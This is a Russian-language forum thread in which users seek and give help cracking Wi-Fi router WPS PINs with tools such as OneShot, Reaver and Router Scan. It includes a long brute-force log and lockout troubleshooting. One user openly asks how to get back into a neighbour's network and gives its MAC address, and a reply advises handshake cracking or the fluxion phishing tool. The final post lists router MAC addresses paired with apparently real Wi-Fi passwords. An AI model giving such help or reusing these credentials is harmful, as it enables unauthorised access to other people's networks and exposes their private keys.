ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.03.2020, 01:19
|
|
Постоянный
Регистрация: 25.07.2018
Сообщений: 498
Провел на форуме:
120581
Репутация:
10
|
|
Сообщение от evel
Пробовал в РоутерСкане PINы "empty", "00000000"
Надеюсь, вы пробовали пустой пин-код (""), а не слово "empty"? В Router Scan для этого в поле для пин-кодов нужно вставить перенос строки (с помощью Enter).
|
|
|
24.03.2020, 01:22
|
|
New Member
Регистрация: 23.03.2020
Сообщений: 3
Провел на форуме:
1114
Репутация:
0
|
|
Сообщение от 4Fun
Надеюсь, вы пробовали пустой пин-код (""), а не слово "empty"? В Router Scan для этого в поле для пин-кодов нужно вставить перенос строки (с помощью Enter).
Всё правильно, пробовал пустой, просто его так написал.
Также пробовал взломать в Bully и Reaver, доходит до M4 и ошибка 0x02.
P.S. и сканер не показывает что роутер в локе.
|
|
|
|
19.04.2020, 18:11
|
|
New Member
Регистрация: 19.04.2020
Сообщений: 2
Провел на форуме:
778
Репутация:
0
|
|
"Сбрутил" wps-пин с помощью Oneshot.py:
python3 oneshot.py -wlan0
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 23:583:00:87:3C (ESSID: Viruscron)
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[*] Sending WPS Message M2…
[*] Received WSC NACK
[-] Error: wrong PIN code
[*] Trying PIN '11112730'…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 23:583:00:87:3C (ESSID: Viruscron)
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[*] Sending WPS Message M2…
[*] Received WSC NACK
[-] Error: wrong PIN code
[*] 99.90% complete @ 2020-04-19 15:36:07 (10.57 seconds/pin)
[*] Trying PIN '11112747'…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 23:583:00:87:3C (ESSID: Viruscron)
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[*] Sending WPS Message M2…
[*] Received WSC NACK
[-] Error: wrong PIN code
[*] Trying PIN '11112754'…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 23:583:00:87:3C (ESSID: Viruscron)
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[*] Sending WPS Message M2…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 23:583:00:87:3C (ESSID: Viruscron)
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[*] Sending WPS Message M2…
[*] Received WSC NACK
[-] Error: wrong PIN code
[*] Trying PIN '11112761'…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 23:583:00:87:3C (ESSID: Viruscoron)
[*] Sending EAPOL Start…
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[*] Sending WPS Message M2…
[*] Received WSC NACK
[-] Error: wrong PIN code
[*] Trying PIN '11112778'…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 23:583:00:87:3C (ESSID: Viruscoron)
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[*] Sending WPS Message M2…
[*] Received WSC NACK
[-] Error: wrong PIN code
[*] Trying PIN '11112785'…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 23:583:00:87:3C (ESSID: Viruscoron)
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[*] Sending WPS Message M2…
[*] Received WSC NACK
[-] Error: wrong PIN code
[*] 99.95% complete @ 2020-04-19 15:36:07 (9.39 seconds/pin)
[*] Trying PIN '11112792'…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 23:583:00:87:3C (ESSID: Viruscoron)
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[*] Sending WPS Message M2…
[*] Received WSC NACK
[-] Error: wrong PIN code
[*] Trying PIN '11112808'…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 23:583:00:87:3C (ESSID: Viruscoron)
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[*] Sending WPS Message M2…
[*] Received WSC NACK
[-] Error: wrong PIN code
[*] Trying PIN '11112815'…
[*] Scanning…
[*] Authenticating…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 23:583:00:87:3C (ESSID: Viruscoron)
[*] Sending EAPOL Start…
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[*] Sending WPS Message M2…
[*] Received WSC NACK
[-] Error: wrong PIN code
[*] Trying PIN '11112822'…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 23:583:00:87:3C (ESSID: Viruscoron)
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[*] Sending WPS Message M2…
[*] Received WSC NACK
[-] Error: wrong PIN code
[*] Trying PIN '11112839'…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 23:583:00:87:3C (ESSID: Viruscoron)
[*] Sending EAPOL Start…
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[*] Sending WPS Message M2…
[*] Received WSC NACK
[-] Error: wrong PIN code
[*] 100% complete @ 2020-04-19 15:36:07 (8.80 seconds/pin)
^C
First half not found…
Session saved in /root/.OneShot/sessions/2358D300873C.run
Вопрос - что делать дальше? Может кто из более опытных знает
|
|
|
|
19.04.2020, 21:31
|
|
Постоянный
Регистрация: 25.07.2018
Сообщений: 498
Провел на форуме:
120581
Репутация:
10
|
|
Сообщение от Linuxfan
Вопрос - что делать дальше? Может кто из более опытных знает
Я правильно понимаю, что лог нецельный, то есть вы его правили?
У OneShot есть недостаток: он не может определить состояние WPS точки, то есть если WPS заблокируется, то вы должны остановить перебор вручную. Судя по тому, что точка возвращает WSC NACK в ответ на M2, WPS заблокирован и продолжать перебор не имеет смысла.
Если пин-код будет подобран, то OneShot напечатает учётные данные в таком формате:
Код:
[+] WPS PIN: ''
[+] WPA PSK: ''
[+] AP SSID: ''
|
|
|
|
21.04.2020, 05:46
|
|
New Member
Регистрация: 19.04.2020
Сообщений: 2
Провел на форуме:
778
Репутация:
0
|
|
Сообщение от 4Fun
Я правильно понимаю, что лог нецельный, то есть вы его правили?
У OneShot есть недостаток: он не может определить состояние WPS точки, то есть если WPS заблокируется, то вы должны остановить перебор вручную. Судя по тому, что точка возвращает WSC NACK в ответ на M2, WPS заблокирован и продолжать перебор не имеет смысла.
Если пин-код будет подобран, то OneShot напечатает учётные данные в таком формате:
Код:
[+] WPS PIN: '<pin>'
[+] WPA PSK: '<password>'
[+] AP SSID: '<essid>'
Да, лог нецельный, это последняя часть процесса перебора. По поводу того, что возвращает WSC NACK в ответ - почему тогда wash -i mon0 показывает что блокировки wps нет?
|
|
|
|
21.04.2020, 07:27
|
|
Постоянный
Регистрация: 25.07.2018
Сообщений: 498
Провел на форуме:
120581
Репутация:
10
|
|
Сообщение от Linuxfan
Да, лог нецельный, это последняя часть процесса перебора. По поводу того, что возвращает WSC NACK в ответ - почему тогда wash -i mon0 показывает что блокировки wps нет?
Некоторые роутеры (преимущественно на чипах MediaTek) впадают в состояние "глюка": WPS формально не блокируется, но тем не менее подключиться по WPS не получается из-за того, что роутер присылвает WSC NACK. Вполне возможно, что ваш такой. Советую посмотреть модель (запустите OneShot без -b) и поискать информацию на WikiDevi, к примеру.
|
|
|
|
23.04.2020, 23:38
|
|
New Member
Регистрация: 23.04.2020
Сообщений: 1
Провел на форуме:
366
Репутация:
0
|
|
Такая штука, раньше мой сосед использовал D-Link , спокойно взломала его вайфай через wps.
Через 1.5 года использования они сменили роутер (купили поновее и современней), название Rostelekom-36,в приложении,котором я взламывала прошлый роутер,написано что безопасность - 30%, т.е пароль стандартный,через wps взломать не получается,пишет что wps заблокирован,и вот уже около года пытаюсь найти pin,пока что никаких успехов. Последняя надежда это вы, так как у меня компьютера на данный момент нет,и все приходится делать через телефон.
mac 74:9d:79:14:72:d6
Какая информация нужна вообще,чтобы узнать pin?
|
|
|
|
24.04.2020, 01:09
|
|
Познавший АНТИЧАТ
Регистрация: 24.03.2012
Сообщений: 1,121
Провел на форуме:
418750
Репутация:
24
|
|
Сообщение от Valeraleraaaaaaaa
безопасность - 30%, т.е пароль стандартный
На заборе ..й написано, а там дрова. WiFi Warden рисует эти проценты с потолка, а точнее видя включенный wps и поддержку wpa-tkip шифрования. Насколько хорошо защищен роутер, можно узнать только на практике, а не ориентируясь на проценты непонятно где.
Сообщение от Valeraleraaaaaaaa
пишет что wps заблокирован
Значит по pin коду не подключиться. Даже по правильному.
74:9d:79:14:72:d6 - это роутер Sercomm RV6699, никакого генератора паролей и pin кодов к ним нет.
Судя по имени сети, возможен номер телефона или номер договора в качестве пароля.
С одним лишь телефоном сеть не победить. И увы, на форумах сидят не маги, шаманы и боги, а обыкновенные люди. Придется доставать ноутбук, хотя бы на день-два, ловить хендшейк и перебирать пароль, или fluxion запускать для добычи пароля.
|
|
|
|
24.04.2020, 06:10
|
|
New Member
Регистрация: 24.04.2020
Сообщений: 1
Провел на форуме:
336
Репутация:
0
|
|
Сообщение от 4Fun
Некоторые роутеры (преимущественно на чипах MediaTek) впадают в состояние "глюка": WPS формально не блокируется, но тем не менее подключиться по WPS не получается из-за того, что роутер присылвает WSC NACK. Вполне возможно, что ваш такой. Советую посмотреть модель (запустите OneShot без -b) и поискать информацию на WikiDevi, к примеру.
Как считаете, возможно переписать скрипт в Oneshot таким образом, что-бы роутер отвечал отправляя не WSC NACK, а то, что необходимо, что-бы получить пин и пробить наконец эту защиту?
Или здесь нужен совершенно новый подход, что нибудь наподобе сильного импульса, выводящего из строя именно блокиратор WPS, но не повреждая при этом остальные микросхемы в роутере, подобно тому, как это происходит при атомном взрыве с электроприборами, но только направленно?
|
|
|
|
03.05.2020, 14:26
|
|
Новичок
Регистрация: 16.09.2009
Сообщений: 0
Провел на форуме:
14577
Репутация:
0
|
|
не знал куда написать) решил здесь написать) заметил некую закономерность. чаще всего в роутерах ZTE он же MTSRouter 4ые символ цифра. Может кто заметит закономерность)
D0:60:8C:00:0D:94 htn4xds4
D0:60:8C:00:0D:0C 67z9eqyb
D0:60:8C:00:0B:54 2eb6zufp
D0:60:8C:00:08:84 sfk6sjuq
D0:60:8C:00:0A:5C kaj5uvdq
D0:60:8C:00:04:2C b3p44ssj
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
